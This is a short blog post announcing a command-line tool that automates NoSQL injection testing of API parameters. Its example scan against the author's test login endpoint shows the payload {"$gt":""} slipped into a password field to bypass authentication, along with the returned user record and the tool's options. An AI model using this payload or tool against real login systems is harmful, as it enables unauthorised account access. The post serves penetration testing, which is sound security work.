DEV Community

Igor Souza Martins
Igor Souza Martins

Posted on • Updated on

Making easier a NoSQLi pentest

Hello, everyone!

Today I've created a project which automates a NoSQLi pentest, but this is the first version and I ask for help in this project.

If you have an interest in helping a little project to become a large project to make our life as "security guys" more easier, please, send issues or send a PR.

So, how this project works?

With some info from a request, the "exploit" can test if the request parameters can be exploited with some payloads of NoSQLi.

Example to exploit an login API, where we have a POST request and we have a JSON data with user and pass:

[igor.martins automated]$ nosqli-checkr scan --host="https://nosql-checkr-test.herokuapp.com/api/v1/login" --data='{ "user": "wubba", "pass": "" }' --method="post" --params="pass" --error-message='{"success":false,"result":"user/pass not found"}'


 ███╗   ██╗  ██████╗  ███████╗  ██████╗  ██╗      ██╗      ██████╗ ██╗  ██╗ ███████╗  ██████╗ ██╗  ██╗ ██████╗  
 ████╗  ██║ ██╔═══██╗ ██╔════╝ ██╔═══██╗ ██║      ██║     ██╔════╝ ██║  ██║ ██╔════╝ ██╔════╝ ██║ ██╔╝ ██╔══██╗ 
 ██╔██╗ ██║ ██║   ██║ ███████╗ ██║   ██║ ██║      ██║     ██║      ███████║ █████╗   ██║      █████╔╝  ██████╔╝ 
 ██║╚██╗██║ ██║   ██║ ╚════██║ ██║▄▄ ██║ ██║      ██║     ██║      ██╔══██║ ██╔══╝   ██║      ██╔═██╗  ██╔══██╗ 
 ██║ ╚████║ ╚██████╔╝ ███████║ ╚██████╔╝ ███████╗ ██║     ╚██████╗ ██║  ██║ ███████╗ ╚██████╗ ██║  ██╗ ██║  ██║ 
 ╚═╝  ╚═══╝  ╚═════╝  ╚══════╝  ╚══▀▀═╝  ╚══════╝ ╚═╝      ╚═════╝ ╚═╝  ╚═╝ ╚══════╝  ╚═════╝ ╚═╝  ╚═╝ ╚═╝  ╚═╝ 


✔ Request finished
✔ Response analyzed
✔ https://nosql-checkr-test.herokuapp.com/api/v1/login is vulnerable

ℹ Payload: {"$gt":""}
ℹ Evil data 😈: {"user":"wubba","pass":{"$gt":""}}
ℹ Data stoled:
{
    "success": true,
    "result": {
        "user": "wubba",
        "_id": "hVFQzFwVlMwCYFBT"
    }
}

Enter fullscreen mode Exit fullscreen mode

The "exploit" test the param pass and find a payload {"$gt":""} which can exploit the NoSQL Injection flaw.

Parameters

  • -h or --host: Route URL. Ex: https://nosql-checkr-test.herokuapp.com/api/v1/login
  • -hr or --headers: Request headers. Ex: token:val or token:val;token2:val2
  • -d or --data: Request data: Ex: { "user": "wubba", "pass": "" }
  • -m or --method: Request method: Ex: post or POST
  • -p or --params: Request params which will be exploited: Ex: pass or user,pass
  • -e or --error-message: The default error message of request. Ex: {"success":false,"result":"user/pass not found"}

Github Project

Github Project

Top comments (0)